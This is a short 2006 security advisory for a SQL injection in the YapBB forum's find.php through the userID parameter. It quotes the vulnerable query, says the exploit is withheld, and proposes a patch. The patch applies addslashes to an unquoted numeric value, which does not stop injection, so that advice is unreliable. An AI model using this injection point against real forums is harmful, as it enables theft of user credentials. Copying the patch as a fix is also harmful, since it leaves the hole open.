|
YapBB <= 1.2 Beta2 find.php SQL Injection Vulnerability |
|
|
|
|
Tuesday, 16 May 2006 |
0x01 Summary
YapBB is a OpenSource Web Forum written in php.
(http://sourceforge.net/projects/yapbb)
This web program is vulnerable to sql injection attack.
So malicious attacker can get Every nicknames(id), passwords for this YapBB.
Lets see the codes ~!
0x02 Testbed
- Fedora Core 2
- MySQL-Server 5.0.19-log
- Php5 ( magic_quotes_gpc = On )
0x03 Codes
~/YapBB-1.2-Beta2/YapBB/find.php:
-
..
34: $userBool = $HTTP_POST_VARS["choice"]=="user"; // if choice == user
36: $userpostBool = !empty($HTTP_GET_VARS["userID"]); // userID == [inject sql]
..
119: else if ($userpostBool)
120: {
128: $postRes = $postQuery->select("SELECT p.date, t.id, t.description, u.nickname FROM " .
$cfgDatabase[post] . " AS p, " . $cfgDatabase[topic] . " AS t, " .
$cfgDatabase[user] . " AS u WHERE t.id = p.topicid AND p.posterid = $userID AND
u.id = p.posterid GROUP BY p.topicid ORDER BY p.date DESC LIMIT 50"); // execute sql!
-
No words.
I wrote a exploit for getting all YapBB users nicknames and passwords.
Sorry i cant put exploit in this advisory =)
0x04 Exploit
[x90c@hackzen testbed]$ whoami
x90c
[x90c@hackzen testbed]$
0x05 Patch
~/YapBB-1.2-Beta2/YapBB/find.php:
..
128: $postRes = $postQuery->select("SELECT p.date, t.id, t.description, u.nickname FROM " .
$cfgDatabase[post] . " AS p, " . $cfgDatabase[topic] . " AS t, " . $cfgDatabase[user] .
" AS u WHERE t.id = p.topicid AND p.posterid = " . addslashes($userID) .
" AND u.id = p.posterid GROUP BY p.topicid ORDER BY p.date DESC LIMIT 50"); // x90c patch!
|